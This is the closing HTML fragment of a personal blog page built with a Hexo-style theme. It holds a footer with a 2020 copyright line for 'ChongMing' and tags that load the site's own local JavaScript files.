      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ChongMing | 感谢阅读</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    <span title="站点总字数">104k</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
